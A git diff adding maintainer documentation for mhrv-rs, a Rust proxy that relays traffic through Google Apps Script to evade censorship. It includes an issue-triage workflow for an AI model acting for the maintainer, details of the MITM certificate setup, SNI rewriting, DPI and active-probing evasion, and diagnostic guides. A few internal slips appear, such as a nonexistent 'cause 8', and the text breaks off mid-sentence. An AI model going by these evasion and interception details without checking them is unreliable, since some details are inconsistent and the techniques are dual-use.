+Keep open: +- **Tracking** — issue serves as canonical reference for a roadmap item (e.g., #313 for ISP throttle, #300 for SABR cliff, #420 for dual-VPS docs) +- **Awaiting user verification** — a fix/workaround was posted, waiting for user to confirm +- **Active diagnostic** — back-and-forth with user gathering data + +When closing as duplicate, always include the canonical issue number in the close comment so future readers can navigate. + +## DOPR (Daily Open PR + Issue Triage) cycle + +For "do DOPR", "check issues", "issues, prs", or similar requests, the workflow is: + +1. **List open PRs**: `gh pr list --state open --limit 20` +2. **List recently-updated issues**: `gh issue list --state open --limit 30 --search "sort:updated-desc"` +3. **For each PR**: review the diff, check CI, decide merge/comment/decline. New PRs from new accounts that look like supply-chain-pattern (typosquat, "update requirements.txt" with weird deps, rebrand-and-replace) get declined politely. Substantive code from known contributors generally gets merged after a local `cargo test --lib` + build. See `references/contributors.md` for who's known. +4. **For each issue updated since last DOPR**: read the latest comments. If there's a new user message, reply substantively (not just "thanks, will look into it"). If there's user confirmation that a fix worked, close the issue. If you've been waiting on user data and they haven't responded for several days, the issue can stay open or be closed with "Closing for now; reopen if it's still happening." (use judgment). +5. **If anything user-visible landed**: cut a patch release. Don't batch up 5 PRs into one big release — ship one at a time. +6. **For each new substantive issue**: write a real reply. Default to writing it in a temp file (e.g., `/tmp/r--.md`) and posting via `gh issue comment N --body-file ...` (avoids HEREDOC quoting hell with backticks and `$()`). + +DOPR replies should not be templated. Use the issue-patterns reference to recognize the situation, then write a reply that addresses _this user's specific report_ — their log lines, their config, their setup. Templated replies are easy to spot and erode trust. + +## Operational guardrails + +- **Don't merge PRs without local verification** — `git fetch && gh pr checkout N && cargo test --lib && cargo build --release`. CI doesn't run tests on PRs in this repo (only the release-drafter), so local verification is the real gate. +- **Don't push to `main` while a release is mid-flight** — `release.yml` auto-fires on tag push and races with subsequent commits. Wait for the release CI to complete before merging more PRs. +- **Don't skip the `--reason` flag on `gh issue close`** — `completed` for resolved, `not planned` for duplicates and architectural limits. +- **Don't update `docs/changelog/` for already-released versions** — the file is the historical record of what shipped. New work goes into a new file for the next version. +- **Don't share AUTH_KEYs, TUNNEL_AUTH_KEYs, or deployment IDs** that a user posted in an issue. They might think they obfuscated them, but if they didn't, don't quote them back. If you need to reference them, use `YOUR_AUTH_KEY` / `` placeholders. diff --git a/docs/maintainer/assets/changelog-template.md b/docs/maintainer/assets/changelog-template.md new file mode 100644 index 00000000..e5f8ffd2 --- /dev/null +++ b/docs/maintainer/assets/changelog-template.md @@ -0,0 +1,8 @@ + +• [توضیح bullet اول به فارسی، با link به issue/PR — مثال: ([#NNN](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/NNN), PR [#MMM](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/MMM) از @contributor)]: شرح آنچه تغییر کرده + چرا اهمیت داره. اطلاعات معماری مرتبط، مقادیر default، و escape hatch‌ها برای کاربرانی که می‌خواهن behavior قدیم رو نگه دارن +• [bullet دوم — همین structure: تغییر + چرا + escape hatch] +• [اگر breaking change وجود داره: **شکستگی سازگاری**: شرح breaking + migration steps] +--- +• [bullet 1 in English ([#NNN](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/NNN), PR [#MMM](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/MMM) by @contributor): description of what changed and why it matters. Architectural context, default values, and escape hatch for users who want to preserve old behavior] +• [bullet 2 in English with the same structure: change + why + escape hatch] +• [if breaking change: **Breaking change**: description + migration steps] diff --git a/docs/maintainer/assets/reply-marker.md b/docs/maintainer/assets/reply-marker.md new file mode 100644 index 00000000..37d98b40 --- /dev/null +++ b/docs/maintainer/assets/reply-marker.md @@ -0,0 +1,2 @@ +--- +[reply via Anthropic Claude | reviewed by @therealaleph] diff --git a/docs/maintainer/references/architecture.md b/docs/maintainer/references/architecture.md new file mode 100644 index 00000000..476b01df --- /dev/null +++ b/docs/maintainer/references/architecture.md @@ -0,0 +1,122 @@ +# Architecture + +## What mhrv-rs is + +mhrv-rs is the Rust port of [`masterking32/MasterHttpRelayVPN`](https://github.com/masterking32/MasterHttpRelayVPN) (Python). It's an HTTP proxy that runs locally on the user's machine (Windows / macOS / Linux / Android, with OpenWRT and Raspbian builds for sidecars) and bridges browser/app traffic out through Google Apps Script. + +The architectural unlock: from the user's ISP perspective, all traffic looks like normal HTTPS to a Google IP. ISPs that censor by SNI / domain / TLS-fingerprint can't block the relay without breaking Google access for their entire customer base. ISPs that censor by destination IP can't block it either, because the destinations are Google data centers. + +Apps Script's `UrlFetchApp.fetch()` is the workhorse — it's a Google-blessed API for outbound HTTPS, and Google effectively runs an open proxy to the rest of the internet on every Apps Script user's behalf. + +## Two operating modes + +### apps_script mode (default) + +``` +client app → mhrv-rs HTTP/SOCKS5 listener → + MITM (intercepts HTTPS, signs with local CA) → + POST batch to Apps Script Web App → + Apps Script's UrlFetchApp.fetch() → upstream destination → + Apps Script returns body → mhrv-rs returns to client +``` + +- **Code.gs** (in `assets/apps_script/Code.gs`) is the script the user deploys to their own Google account at `script.google.com`. Each deployment gets a `script_id` like `AKfycbz1abc...`. +- The MITM layer signs HTTPS leaf certs on the fly using a CA installed in the user's trust store. This lets mhrv-rs read the plaintext request, batch it through Apps Script, and return the response to the client. +- All upstream protocols are HTTP/HTTPS. **No UDP, no MTProto, no QUIC, no WebRTC.** Apps Script can't carry them. +- Per-Apps-Script-account quota: ~20,000 UrlFetchApp calls/day, 30 concurrent, 6-min per-invocation cap, 30s soft response cliff. + +### Full mode + +``` +client app → mhrv-rs SOCKS5 → + signal/control via Apps Script (small JSON RPC) → + Apps Script calls into tunnel-node container on user's VPS → + tunnel-node opens TCP socket to upstream → + bytes flow through tunnel-node ↔ Apps Script ↔ mhrv-rs ↔ client +``` + +- **CodeFull.gs** (in `assets/apps_script/CodeFull.gs`) is a different Apps Script — replaces Code.gs's local-fetch with calls to a tunnel-node container. +- **tunnel-node** is a small axum-based Rust HTTP server (in `tunnel-node/`) that the user runs on their own VPS via Docker. Image: `ghcr.io/therealaleph/mhrv-tunnel-node:latest`. +- The bytes flow through the actual TCP tunnel between tunnel-node and the upstream server — Apps Script only handles the **signaling** for tunnel session lifecycle. This means Apps Script's 30s response cap doesn't apply to long-running connections (no SABR cliff). Bigger uploads/downloads work. +- Trade-off: requires a VPS ($3-5/month from Hetzner/Contabo/OVH/Parspack), more setup steps, three places to keep AUTH_KEYs in sync. +- The VPS does NOT need to be reachable from Iran directly. Apps Script (running in Google's data center) is the one that talks to the VPS, so the user's ISP only sees the user-to-Apps-Script leg, which is Google IPs. + +## The three secrets + +These are the constant source of user confusion. Get the names right: + +| Secret | Lives where | Must match | Notes | +|--------|-------------|------------|-------| +| `AUTH_KEY` (or `auth_key` in mhrv-rs config.json) | mhrv-rs `config.json` ↔ `Code.gs`/`CodeFull.gs` | Both ends | Per-deployment user secret; protects against random people hitting the user's deployment URL. Editing it in Code.gs without **redeploying as a new version** in Apps Script is the single most common user mistake. | +| `TUNNEL_AUTH_KEY` | `CodeFull.gs` ↔ tunnel-node container env var | Both ends | Full mode only. Env var name is **literally `TUNNEL_AUTH_KEY`** — uppercase, with underscores, exact string. Several users have written `MHRV_AUTH_KEY` (wrong) or `Tunnel` (wrong); the env var is case-sensitive in Linux/Docker and any deviation falls back to the default `changeme`. | +| `DIAGNOSTIC_MODE` | `Code.gs` and `CodeFull.gs` (constant at top) | n/a — local toggle | When `false` (default), the script returns a benign HTML decoy (`"The script completed but did not return anything"`) for bad-auth requests, mimicking Apps Script's own placeholder. When `true`, returns explicit JSON `{"e":"unauthorized"}`. The decoy mode is anti-active-probing defense (#357 pattern); diagnostic mode is for setup. | + +## Apps Script's hidden constraints + +These are constraints Google enforces on Apps Script's `UrlFetchApp.fetch()` that shape what mhrv-rs can and can't do: + +1. **Self-loop restriction** — `UrlFetchApp.fetch()` blocks calls to `*.google.com`, `*.googleapis.com`, `*.gstatic.com`, `*.googleusercontent.com`. **Google services are unreachable through apps_script mode by design.** Includes `gmail.com`, `meet.google.com`, `colab.research.google.com`, `drive.google.com`, `script.google.com` itself (ironic — you can't proxy your way to manage your own deployment). Workaround for users with VPS: dual-routing in xray (route Google direct from VPS, everything else through mhrv-rs). Without VPS, no workaround — point users at #420. +2. **30-second response cliff** — Apps Script Web Apps have a soft cap of 30s on the response. Long downloads or video streams (YouTube SABR, large file downloads >50 MB through MITM) get truncated. Tracked as #300 (SABR cliff). v1.9.0 xmux roadmap aims to mitigate by splitting across deployments. +3. **6-minute per-invocation cap** — hard limit. After this, `UrlFetchApp.fetch()` throws and Apps Script kills the request. +4. **30 concurrent executions per Apps Script account** — affects users who put the same `script_id` under heavy load. Lower `parallel_concurrency` in mhrv-rs config to avoid hitting this. +5. **Daily quota: 20,000 UrlFetchApp calls per Google account** — resets at 00:00 UTC. Multi-deployment rotation across multiple Google accounts is the workaround. +6. **Per-100s rolling soft quota** — undocumented but consistently observed. When tripped, returns the placeholder body (one of the 6 candidate causes for the placeholder; see `diagnostic-taxonomy.md`). +7. **Localized error pages** — Apps Script returns its placeholder body in the locale of the deploying account or origin IP. For Iranian users, this means a Persian HTML page. v1.8.3 detection now distinguishes this case. + +## The MITM CA + +To intercept HTTPS in apps_script mode, mhrv-rs runs a per-machine CA: + +- Generated on first run, stored at `/ca/ca.crt` and `ca.key`. +- Installed into the user's OS trust store via the `cert_installer` module. +- On Windows: user-trust store via `certutil -addstore`. +- On macOS: login keychain via `security`. +- On Linux: distro-specific (NSS for Firefox, system bundle for Chrome/curl). +- **On Android**: only the **user trust store**, not system. Most apps (YouTube, Gmail, Telegram, Instagram, banking) only trust the system store, so they don't see mhrv-rs. Chrome/Firefox/Edge browsers explicitly opt in to user trust and DO use mhrv-rs. This is the Android user-trust-store gotcha that drives much of the Android UX confusion. Workaround for power users: root + Magisk + MagiskTrustUserCerts module migrates user CA to system. + +The `--remove-cert` CLI flag tears down the CA cleanly (uninstall from trust store + delete files). PR #121 from `dazzling-no-more` added this; lives in `src/main.rs` `remove_cert` flow. + +## SNI rewriting + google_ip rotation + +The TLS handshake between mhrv-rs and Apps Script does: + +- **TCP connect** to `google_ip` (default `216.239.38.120` — a Google edge IP) +- **TLS SNI** = `www.google.com` (rewritten — this is what the ISP sees in cleartext) +- **HTTP Host header** = `script.google.com` (the real destination, hidden inside the encrypted tunnel) + +Iran ISPs occasionally filter specific Google IPs (#313 pattern). When this happens, the user can rotate `google_ip` to another IP from `DEFAULT_GOOGLE_SNI_POOL` (the 12-entry list in `src/domain_fronter.rs`). `mhrv-rs scan-ips` is a diagnostic command that probes Google IPs from the user's network and reports which ones complete TLS handshakes. + +`scan_config.json` (separate from main `config.json`) is the input for `mhrv-rs scan-ips` — users sometimes confuse the two and put the scan config where the main config should be. See `issue-patterns.md`. + +## v1.8.0 anti-fingerprinting features + +- **Random padding** (`_pad` field, 0-1024 bytes uniform random, base64) — defeats DPI length-distribution fingerprinting. Users on heavily-throttled ISPs can disable with `disable_padding: true` (~25% bandwidth savings) — landed in v1.8.1. +- **Auto-blacklist deployments** that timeout repeatedly (#319) — round-robin pool actively excludes failing deployments for a cooldown period. Tunable strike threshold queued for v1.8.x. +- **Decoy responses** for bad-auth requests — see `DIAGNOSTIC_MODE` above. +- **Active-probing defense** — random benign body on `doGet` requests so a probe to the deployment URL doesn't reveal that it's a relay. + +## v1.8.3 features (just shipped) + +- **DoH bypass** — DNS-over-HTTPS to Cloudflare/Google/Quad9/AdGuard/etc. routes around the Apps Script tunnel via plain TCP/443. Saves ~2s per DNS lookup. Default on; opt out with `tunnel_doh: true`. +- **H1 container keepalive** — 240s ping to prevent Apps Script V8 cold-start stalls. Visible win for YouTube playback after pause. +- **64 KB header cap with HTTP 431** — replaces silent socket drops that caused browser retry loops on oversized headers. +- **Spreadsheet-backed response cache** in Code.gs (opt-in via `CACHE_SPREADSHEET_ID`) — TTL-aware, Vary-aware, circular-buffer for O(1) writes. Reduces UrlFetchApp quota consumption. + +## Key files in the repo + +- `src/main.rs` — CLI binary entry point. `init_logging()` reads `config.log_level`. `Cmd::Test`, `Cmd::ScanIps`, etc. as subcommands. +- `src/bin/ui.rs` — UI binary entry (Windows + Android via JNI). Shares lib code via `mhrv_rs::*`. The `install_ui_tracing` function (post-v1.8.2) reads `RUST_LOG > config.log_level > info,hyper=warn`. +- `src/lib.rs` — re-exports for the lib + Android JNI shim. +- `src/domain_fronter.rs` — the SNI-rewrite TLS dialer + the `DomainFronter` orchestrator. `DEFAULT_GOOGLE_SNI_POOL` lives here. +- `src/proxy_server.rs` — HTTP/SOCKS5 listeners, dispatch logic, DoH bypass, MITM mode entry. +- `src/tunnel_client.rs` — Full mode batch client. Decoy detection + script_id-in-logs added v1.8.1; softer 6-cause message v1.8.3. +- `src/mitm/` — MITM cert manager. +- `src/cert_installer/` — per-OS trust store installation logic. +- `src/config.rs` — `Config` struct + JSON serde. Default values, validation. +- `assets/apps_script/Code.gs` and `CodeFull.gs` — server-side scripts. Edit these and tell users to redeploy as new version in Apps Script. +- `tunnel-node/` — separate Rust crate for the Full-mode VPS container. README + README.fa.md (Persian translation). +- `android/app/src/main/java/com/therealaleph/mhrv/` — Android Kotlin glue. `MhrvVpnService.kt` is the VPNService that calls into Rust via JNI. `ConfigStore.kt` is the form/preferences round-trip. +- `docs/changelog/` — versioned changelog files. Format: Persian, then `---`, then English. +- `.github/workflows/release.yml` — release CI: builds for all platforms, attaches to GitHub release. +- `.github/workflows/telegram-publish-files.yml` — fires on `workflow_run` of release.yml; posts each file individually to the Telegram channel `-1003966234444` with Persian captions, SHA-256 in caption, and a cross-link from the main channel. +- `.github/scripts/telegram_publish_files.py` — stdlib-only Python script that does the actual Telegram posting (no `requests` dep so it works in minimal CI runners). diff --git a/docs/maintainer/references/contributors.md b/docs/maintainer/references/contributors.md new file mode 100644 index 00000000..1330fd5f --- /dev/null +++ b/docs/maintainer/references/contributors.md @@ -0,0 +1,126 @@ +# Contributor ecosystem + +The project's substantive contributors fall into a few specialty domains. Knowing who-does-what lets you tag the right reviewer, weight feedback appropriately, and route new design decisions to the people most likely to have informed opinions. + +## Project owner + +### @therealaleph + +Maintainer. Final authority on architectural decisions, release timing, what merges. Persian/English bilingual. Replies that go through Claude carry the marker `[reply via Anthropic Claude | reviewed by @therealaleph]` and are reviewed before posting. + +## Core community contributors + +These are the contributors whose substantive PRs and reports have shaped the project's roadmap. When designing features that touch their domain, tag them for review. + +### @w0l4i + +**Domain**: deep diagnostic feedback, architectural insight, persistence on hard bugs. + +**Notable contributions**: +- Drove the v1.8.1 → v1.8.2 → v1.8.3 evolution of decoy detection. Reported the false-positive in v1.8.1 that led to the 4-cause taxonomy (then 5-cause, then 6-cause). +- Reported the Persian-localized quota body case (#404) after multiple iterations through wrong hypotheses (third-party relay → Iranian VPS appliance → Hetzner DE → Apps Script account locale). +- Suggested the v1.8.x "per-deployment auto-throttle" feature (AIMD style) with detailed rationale. +- Suggested the v1.9.0 xmux roadmap items: byte-range slipstreaming across deployments, MTU/packet-size optimization, per-deployment burst limits. +- Drove the v1.8.x DNS architecture redesign by pointing out that Iranian DNS providers (Shecan, 403) perform DNS hijacking and poisoning — they cannot be trusted as privacy-preserving alternatives (see #449). + +**How to engage**: +- Reports are detailed and self-correct fast as data comes in +- Setups tend to be advanced (multiple deployments, Hetzner VPS, Full mode) +- Tag as a core reviewer for v1.9.0 xmux design issue when filed +- Communication: English + +### @2bemoji + +**Domain**: roadmap design discussions, particularly for QUIC blocking and DNS optimization. + +**Notable contributions**: +- Drove the design of `block_quic` 3-state UI toggle (off / drop / reject with ICMP unreachable for instant Happy Eyeballs failover) in #361 / #377 +- Surfaced the mobile-accessibility framing for `block_quic` (config-only is "Linux desktop only" for users who can't easily edit Android's `/data/data/...` config) + +**How to engage**: +- Tag for Android UI batch decisions, especially anything touching QUIC / DNS / network-layer toggles +- Tag for v1.9.0 xmux design as a core reviewer +- Communication: English + +### @ipvsami / Sam Ashouri + +**Domain**: advanced Full mode setups, dual-VPS topologies, account suspension reports. + +**Notable contributions**: +- Reported the Iranian-VPS xray entry topology in #420 (Iranian VPS as xray entry, German VPS as tunnel-node exit) — drove the dual-routing-xray design discussion +- Reported the Google account flag pattern in #421 (phone-less new accounts, "action required" notifications, Workspace landing HTML on flagged deployments) — drove the v1.8.x detection for the 6th cause in the diagnostic taxonomy + +**How to engage**: +- Comfortable with VPS / xray / network routing; explanations can assume that level +- Tag for v1.9.0 xmux design as a core reviewer +- Communication: English + +### @dazzling-no-more + +**Domain**: code contributor — substantive Rust PRs. + +**Notable contributions**: +- PR #121 (`--remove-cert` flag for clean CA teardown) +- PR #359 (Google Drive queue tunnel mode — community-testing, awaiting cleanup confirmation) +- PR #438 (H1 container keepalive + 431 oversized headers + clearer port-collision message — merged in v1.8.3) +- PR #439 (DoH bypass for Cloudflare/Google/Quad9/etc. on TCP/443 — merged in v1.8.3) +- PR #446 (tunnel-node long-poll raised to 15s, adaptive straggler settle — merged in v1.8.4) + +**How to engage**: +- PRs tend to be self-contained with tests and clean diffs +- Address review feedback substantively — they iterate based on reviewer comments +- Tag for v1.9.0 xmux design as a core reviewer (could potentially contribute the implementation) +- Communication: English + +### @euvel + +**Domain**: code contributor — Apps Script (Code.gs) features. + +**Notable contributions**: +- Designed the spreadsheet-backed response cache (#400 design discussion → PR #443 implementation) +- All 5 review suggestions from the design discussion implemented in PR #443: TTL-aware caching, 35 KB body-size gate, header rewriting on hit, circular buffer for O(1) writes, Vary-aware compound cache keys + +**How to engage**: +- Apps Script JavaScript expertise; consider tagging for any future Code.gs changes +- Communication: English + +## Adjacent projects + +### @masterking32 + +Original Python project (`masterking32/MasterHttpRelayVPN`). mhrv-rs is the Rust port; the project periodically cherry-picks stability/feature commits from masterking32. PR #438 in v1.8.3 was a batch of three such cherry-picks. Not a direct contributor here, but the project's design parent. + +### @denuitt1 + +Maintainer of `denuitt1/mhr-cfw` — Cloudflare Workers backend that aims to be Apps Script-compatible. Independent project, not officially endorsed. Tracked in #380 / #393 for compatibility audit. Not a direct contributor here. + +### @g3ntrix, @mehrad-mz + +Authors of forks/branches on the Python project that occasionally have valuable commits to cherry-pick (see #430 for the audit list). + +## Tagging conventions + +When tagging in a comment: + +- Reviewer requests: "@dazzling-no-more — would you mind reviewing this approach?" +- Cross-references: "see [#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404) where @w0l4i described this" +- Recognition: "this drove the design — thanks @euvel for the detailed initial proposal" +- For v1.9.0 xmux design issue specifically (when it's filed): tag @w0l4i, @2bemoji, @ipvsami, @dazzling-no-more, @euvel as core reviewers + +Don't ping people gratuitously; each ping should have a clear ask or recognition. + +## Project history context + +The project predates this repo as `masterking32/MasterHttpRelayVPN` (Python). The Rust port was started for performance + cross-platform binary distribution. Apps Script protocol stayed compatible across both, and we periodically cherry-pick from upstream Python. v1.7.x represented the initial port stabilization; v1.8.x is the "DPI evasion + diagnostics + community-contribution batch"; v1.9.0 will be the xmux flagship. + +Canonical "long" issues for context: +- #313 — Iran ISP throttle, primary tracking issue +- #300 — SABR cliff, primary tracking for video streaming limit +- #310 — VPS setup help, primary tracking for setup questions +- #333 — VPS / Full mode / Iranian-network workarounds +- #420 — dual-VPS topology, primary tracking for advanced Full mode +- #382 — Cloudflare error patterns +- #325 — community-shared deployment workflow +- #361 / #377 — Android UI batch + QUIC blocking design +- #369 — v1.9.0 xmux design (RFC, not yet filed as the formal design issue) +- #449 — DNS architecture redesign (post-Shecan correction) diff --git a/docs/maintainer/references/diagnostic-taxonomy.md b/docs/maintainer/references/diagnostic-taxonomy.md new file mode 100644 index 00000000..35b8b6f8 --- /dev/null +++ b/docs/maintainer/references/diagnostic-taxonomy.md @@ -0,0 +1,161 @@ +# Diagnostic taxonomy: the placeholder body + +## What this is + +Multiple distinct conditions cause Apps Script (or our own scripts on Apps Script) to return an HTML body that mhrv-rs's batch parser sees as `bad response: no json in batch response: `. Through user reports and iteration we've narrowed the body strings to **6 candidate causes**. Distinguishing them requires both client-side detection (string-match on body content) and server-side disambiguation (`DIAGNOSTIC_MODE` flag in Code.gs). + +This taxonomy is the post-mortem evolution of v1.8.0 → v1.8.1 → v1.8.2 → v1.8.3 detection. v1.8.1 falsely asserted "AUTH_KEY mismatch" on body match; v1.8.2 softened to enumerate 4 candidates; v1.8.3 added the Persian-localized cause and the Workspace landing HTML cause for account-flagged deployments — bringing the count to 6. + +## The 6 candidate causes + +### 1. AUTH_KEY mismatch (intentional decoy) + +**Body**: +```html + + +Web App +

The script completed but did not return anything.

+ +``` + +**Source**: Our `Code.gs` / `CodeFull.gs` returns this when `request.k !== AUTH_KEY` and `DIAGNOSTIC_MODE = false`. It mimics Apps Script's stock placeholder for empty-return scripts. + +**Trigger**: User edited AUTH_KEY in Apps Script editor but didn't redeploy as new version, OR user has different AUTH_KEY in `config.json` than in `Code.gs`, OR user is using Code.gs deployment ID with `mode: full` (which expects CodeFull.gs). + +**Disambiguator**: Set `DIAGNOSTIC_MODE = true` in Code.gs / CodeFull.gs + redeploy as new version. Then this case returns `{"e":"unauthorized"}` (explicit JSON) instead of the HTML. The other 5 cases are independent of DIAGNOSTIC_MODE and still return their natural body. + +**Fix**: Align AUTH_KEY values + redeploy as new version. + +### 2. Apps Script execution timeout + +**Body**: same `"The script completed but did not return anything"` HTML, but emitted by Apps Script itself (not our script) when the execution exceeded the per-invocation cap. + +**Source**: Apps Script's runtime kills the script after 6-min hard cap or 30s soft cap on Web App responses, then serves the placeholder body. + +**Trigger**: Slow upstream destination, large response payload, network stall mid-fetch. + +**Disambiguator**: With `DIAGNOSTIC_MODE = true`, AUTH_KEY mismatch (cause 1) goes away; if the placeholder body still appears for some batches, it's likely cause 2/3/4/5/6. + +**Fix**: Lower `parallel_concurrency` in `config.json`, retry, accept some intermittent failures. + +### 3. Apps Script soft-quota tear + +**Body**: same placeholder HTML. Sometimes a different short HTML page mentioning Apps Script's quota system. + +**Source**: Apps Script's per-100s rolling soft quota or per-account daily quota hit. Apps Script kills the request mid-execution. + +**Trigger**: Account-aggregate UrlFetchApp throughput exceeded per-100s threshold (~30 concurrent or so). Common with multi-device single-deployment users during page load events (browsers fire 50+ requests in a burst). + +**Disambiguator**: Same as 2 — DIAGNOSTIC_MODE rules out AUTH_KEY but doesn't distinguish 2 from 3 from 4. Check the per-script_id error rate over a few minutes — if a deployment has 30%+ failure rate during peak browser activity but works fine when idle, it's quota-related (3 or possibly 5). + +**Fix**: Lower `parallel_concurrency`, add more deployments to `script_ids` rotation, distribute deployments across multiple Google accounts. + +### 4. Iran ISP-side response truncation + +**Body**: typically truncated mid-stream — the body that arrives at mhrv-rs is missing the trailing JSON envelope. The early bytes look like a valid Apps Script response prefix but the request was cut by an ISP-side TCP RST mid-flight. + +**Source**: Iran's ISP infrastructure (especially TCI/مخابرات) actively RST-injects on TLS connections to specific Google IPs (the #313 pattern). + +**Trigger**: Network-conditional. Active throttle periods (sometimes hours, sometimes days). Worse on certain Google IPs. Worse on certain Iranian ISPs. + +**Disambiguator**: Direct curl test from the user's network (see `issue-patterns.md` Pattern 3). If curl-to-Apps-Script also gets timeouts/RST, confirmed ISP-side. The HTML body in this case is partial/truncated — sometimes just ` + + + ... +``` + +May also include phrases like `از سهمیه پهنای باند مجاز فراتر رفته‌اید` ("you exceeded the allowed bandwidth quota") and `مقدار انتقال داده را کمتر کنید` ("reduce data transfer volume"). + +**Source**: Apps Script itself. Apps Script localizes its system error pages based on the deploying Google account's locale (fa-IR for Persian) and/or the request-origin IP. + +**Trigger**: Account is Persian-locale (common for Iranian users) AND hit a quota threshold (cause 3) OR an internal Google-side hiccup. + +**Disambiguator**: With `DIAGNOSTIC_MODE = true`, cause 1 returns explicit JSON; if Persian HTML still appears, it's not our script — it's Apps Script's own response. + +**Important**: w0l4i's case in #404 traced through several wrong hypotheses before landing here: +- Initially diagnosed as AUTH_KEY mismatch → no, mixed success/failure on same `script_id` +- Then diagnosed as third-party relay (`g.workstream.ir` looks Iranian) → no, w0l4i clarified it's his own tunnel +- Then diagnosed as Iranian VPS provider appliance → no, Hetzner Nuremberg +- Final landing: Apps Script's own Persian-localized quota response based on Google account locale + +This iteration is documented because the false starts are instructive — don't lock in on the first hypothesis. + +**Fix**: Same as cause 3 (it's a quota issue presenting as Persian HTML). + +### 6. Workspace landing HTML for account-flagged deployments + +**Body**: +```html + + + ... +``` + +The body is Google Workspace's landing page (the description "Word web processing, presentations, and spreadsheets" is the standard tagline for Google Docs/Sheets/Slides). It's served by Apps Script when the deployment owner's Google account is in a flagged state (post-warning, pre-suspension). + +**Source**: Apps Script refuses to execute the deployed script when the owning account is restricted, and serves the Workspace landing page as a "log in" prompt instead. + +**Trigger**: Account is in stage 1b or stage 2 of the suspension progression (see `issue-patterns.md` Pattern 8). Often correlates with phone-less new accounts that ignored the "action required" prompt. + +**Disambiguator**: Owner of the deployment can log in to Google → see if there are pending warnings or restrictions. If yes → fix the account (add phone) or rotate the deployment to a healthier account. + +**Fix**: Account-side, not config-side. Add phone verification, OR move to a different deployment owner via #325 workflow. + +## v1.8.3 detection logic + +```rust +// In src/tunnel_client.rs around line 893+ +if err_msg.contains("The script completed but did not return anything") { + tracing::error!( + "batch failed (script {}): got the v1.8.0 decoy/placeholder body — \ + could be (1) AUTH_KEY mismatch (run a direct curl probe against \ + the deployment to verify), (2) Apps Script execution timeout or \ + per-100s quota tear (try lowering parallel_concurrency), \ + (3) Apps Script internal hiccup (transient, retry next batch), \ + or (4) ISP-side response truncation (#313 pattern, try a \ + different google_ip). To distinguish (1) from the rest: set \ + DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy as new \ + version — only AUTH_KEY mismatch returns this body in diagnostic \ + mode.", + sid_short + ); +} +``` + +This is the v1.8.2 string. v1.8.3 adds detection for the Persian quota body and the Workspace landing HTML as separate paths. + +## When responding to users showing this log + +The right response shape is: + +1. **Acknowledge** the log line they pasted +2. **Enumerate** the 6 (or 4-5 in older versions) candidate causes briefly +3. **Identify the most likely** for their specific case using context clues: + - Single-deployment user, fresh setup → likely cause 1 (AUTH_KEY) + - Mixed success/failure on same script_id → NOT cause 1 (AUTH_KEY would fail 100%) + - "Worked yesterday, broken today" → likely cause 4 (ISP throttle) or cause 8 (account flag in progression) + - High concurrency / many devices on one deployment → likely cause 3 (quota) or cause 5 (Persian quota variant) + - Persian HTML body → cause 5 or 6 + - Hetzner/Iranian VPS Full-mode user → check if VPS is actually Iranian (provider appliance is real for Iranian VPS only) +4. **Give the disambiguator**: DIAGNOSTIC_MODE flip + redeploy +5. **Give the immediate workaround** appropriate to the most-likely cause + +Don't claim certainty before disambiguator data. v1.8.1 over-asserted; v1.8.3 explicitly enumerates because we learned to. + +## What v1.8.x roadmap is doing about this + +- **Per-script_id error-category counter** — surface in CLI/UI: "deployment AKfycbz1: 95% success, 4% timeout, 1% quota, 0% auth_mismatch over last 5 min". Lets users diagnose without flipping DIAGNOSTIC_MODE. +- **Distinct error categories in client logs** — separate AUTH_KEY mismatch / timeout / quota / ISP truncation / Persian quota / Workspace landing into 6 distinct error log lines. Currently merged. +- **AIMD per-deployment auto-throttle** — automatically lower `parallel_concurrency` for deployments that hit quota too often. Find the sustainable rate per deployment without manual tuning. + +These are queued for v1.8.x batch (~2-4 weeks). diff --git a/docs/maintainer/references/issue-patterns.md b/docs/maintainer/references/issue-patterns.md new file mode 100644 index 00000000..87dd77b5 --- /dev/null +++ b/docs/maintainer/references/issue-patterns.md @@ -0,0 +1,327 @@ +# Issue patterns + +The repo gets the same ~15 issues over and over with different wrappers. Recognizing the pattern fast is most of the maintenance job. Each section below covers: the symptoms users describe, what's actually happening, how to diagnose, and the canonical reply structure. + +## Pattern 1: AUTH_KEY mismatch (the v1.8.0 decoy body) + +**Symptoms**: +- `502 Relay error: bad response: no json in: ...The script completed but did not return anything` +- v1.8.1+ logs say `got the v1.8.0 bad-auth decoy` (now soft-language in v1.8.3) +- Issue title often "502 error", "خطای 502", "ارور relay", or "no json in batch response" +- Often combined with: "MITM mode works but Full mode doesn't" (CodeFull.gs has different AUTH_KEY than Code.gs) + +**Root cause**: The `AUTH_KEY` constant in `Code.gs` (or `CodeFull.gs`) on Apps Script doesn't match the `auth_key` field in mhrv-rs `config.json`. Apps Script returns the v1.8.0 decoy HTML. + +**The hidden killer**: Apps Script does NOT auto-pickup edits to deployed scripts. Editing `const AUTH_KEY = "..."` in the Apps Script editor and clicking Save does nothing for the deployed version. The user must: + +1. Apps Script web editor → **Deploy → Manage Deployments** +2. Click the deployment → pencil/Edit +3. Version dropdown → **New version** +4. Click Deploy + +This redeploys with the new AUTH_KEY. Most users skip this and stay on the old version. + +**Diagnostic procedure**: + +Tell the user to flip `DIAGNOSTIC_MODE = true` at the top of `Code.gs` / `CodeFull.gs`, redeploy as new version, and re-test: + +- If they still see the same decoy body → it's NOT AUTH_KEY mismatch (one of the other 5 candidate causes — see `diagnostic-taxonomy.md`) +- If they see explicit JSON `{"e":"unauthorized"}` → confirmed AUTH_KEY mismatch; align values + redeploy as new version + +**Canonical reply structure** (from #414 thread): + +1. Confirm the symptom matches the v1.8.x decoy detection +2. Walk through the 6 candidate causes and explain why AUTH_KEY mismatch is most likely for their case +3. Detail the redeploy-as-new-version steps with exact UI clicks +4. Suggest the DIAGNOSTIC_MODE flip as the disambiguator +5. Close with link to `diagnostic-taxonomy.md`-equivalent context + +## Pattern 2: TUNNEL_AUTH_KEY env var name confusion (Full mode) + +**Symptoms**: +- User on Full mode, Docker container set up +- `docker logs mhrv-tunnel` shows `tunnel_auth_key not set, using defaults` +- Or: AUTH_KEY mismatch errors in mhrv-rs that the user "definitely" set correctly +- Often Persian-language issue (matches Iranian VPS user demographic) + +**Root cause**: User typed 